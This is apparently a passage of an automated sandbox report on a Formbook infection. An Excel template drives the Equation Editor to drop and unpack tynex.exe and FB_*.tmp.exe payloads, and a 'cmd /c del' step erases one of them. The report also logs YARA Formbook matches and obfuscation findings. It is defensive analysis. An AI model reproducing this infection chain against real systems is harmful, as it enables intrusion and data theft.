            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: String function: 009E3F92 appears 108 times
            Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 025EE2A8 appears 38 times
            Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 025EDF5C appears 118 times
            Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0263373B appears 238 times
            Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 02633F92 appears 108 times
            Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0265F970 appears 81 times
            Source: FB_BFF5.tmp.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: FB_BFF5.tmp.exe.5.drStatic PE information: No import functions for PE file found
            Source: FB_C479.tmp.exe.5.drStatic PE information: No import functions for PE file found
            Source: 7.0.FB_C479.tmp.exe.1340000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 7.0.FB_C479.tmp.exe.1340000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.tynex.exe.36294d0.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.tynex.exe.36294d0.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 7.2.FB_C479.tmp.exe.1340000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 7.2.FB_C479.tmp.exe.1340000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.tynex.exe.39186d0.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.tynex.exe.39186d0.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.tynex.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.tynex.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.tynex.exe.37dba40.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.tynex.exe.37dba40.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, type: DROPPEDMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, type: DROPPEDMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: New_1007572_021[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: tynex.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: tynex.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: FB_C479.tmp.exe.5.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: FB_C479.tmp.exe.5.drStatic PE information: Section .text
            Source: tynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
            Source: classification engineClassification label: mal100.troj.expl.evad.winXLTX@13/9@2/1
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeCode function: 5_2_00401000 FindResourceA,SizeofResource,LoadResource,LockResource,GetTempPathA,GetTempFileNameA,MoveFileExA,MoveFileExA,sprintf,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,FreeResource,MoveFileExA,ExitProcess,
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$New_1007572_021.xltxJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE214.tmpJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\Public\tynex.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\Public\tynex.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: New_1007572_021.xltxReversingLabs: Detection: 39%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\tynex.exe C:\Users\Public\tynex.exe
            Source: C:\Users\Public\tynex.exeProcess created: C:\Users\user\AppData\Local\Temp\tynex.exe C:\Users\user\AppData\Local\Temp\tynex.exe
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe'
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe'
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe'
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\tynex.exe C:\Users\Public\tynex.exe
            Source: C:\Users\Public\tynex.exeProcess created: C:\Users\user\AppData\Local\Temp\tynex.exe C:\Users\user\AppData\Local\Temp\tynex.exe
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe'
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe'
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe'
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\Public\tynex.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: wntdll.pdb source: FB_C479.tmp.exe, cscript.exe
            Source: Binary string: cscript.pdbN source: FB_C479.tmp.exe, 00000007.00000002.2220113771.0000000000370000.00000040.00000001.sdmp
            Source: Binary string: cscript.pdb source: FB_C479.tmp.exe, 00000007.00000002.2220113771.0000000000370000.00000040.00000001.sdmp

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: New_1007572_021[1].exe.2.dr, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs.Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: tynex.exe.2.dr, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs.Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: tynex.exe.4.dr, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs.Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.tynex.exe.11a0000.0.unpack, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs.Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.2.tynex.exe.11a0000.1.unpack, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs.Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 5.2.tynex.exe.380000.0.unpack, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs.Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 5.0.tynex.exe.380000.0.unpack, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs.Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: New_1007572_021[1].exe.2.drStatic PE information: 0xDF29736D [Sun Aug 22 17:54:53 2088 UTC]
            Source: C:\Users\Public\tynex.exeCode function: 4_2_002919F0 push 0000006Ch; ret
            Source: C:\Users\Public\tynex.exeCode function: 4_2_00B50A5D push eax; retf 001Bh
            Source: C:\Users\Public\tynex.exeCode function: 4_2_00B53EF8 pushfd ; iretd
            Source: C:\Users\Public\tynex.exeCode function: 4_2_08193117 push edi; iretd
            Source: C:\Users\Public\tynex.exeCode function: 4_2_08193D79 pushfd ; iretd
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0135D12C push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0135D166 push dword ptr [CCC28DB9h]; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_01357140 push edi; retf
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_01357814 push eax; retf
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0135D075 push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0135784D push eax; retf
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0135D0C2 push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0135D0CB push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0134EDBC push edx; retf
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0135C443 push eax; iretd
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0135E4EE push ds; iretd
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0135D773 push dword ptr [CCC28DB9h]; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0099DFA1 push ecx; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025EDFA1 push ecx; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0008D075 push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0008D0CB push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0008D0C2 push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0008D12C push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_00087140 push edi; retf
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0008D166 push dword ptr [CCC28DB9h]; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0008C443 push eax; iretd
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0008E4EE push ds; iretd
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0008D773 push dword ptr [CCC28DB9h]; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_00087814 push eax; retf
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0008784D push eax; retf
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0007EDBC push edx; retf
            Source: initial sampleStatic PE information: section name: .text entropy: 7.98710710749
            Source: initial sampleStatic PE information: section name: .text entropy: 7.98710710749
            Source: initial sampleStatic PE information: section name: .text entropy: 7.98710710749
            Source: initial sampleStatic PE information: section name: .text entropy: 7.40373413401
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeFile created: C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeFile created: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\tynex.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exeJump to dropped file
            Source: C:\Users\Public\tynex.exeFile created: C:\Users\user\AppData\Local\Temp\tynex.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\tynex.exeJump to dropped file

            Boot Survival:

            barindex
            Drops PE files to the user root directoryShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\tynex.exeJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\tynex.exeProcess information set: NOOPENFILEERRORBOX
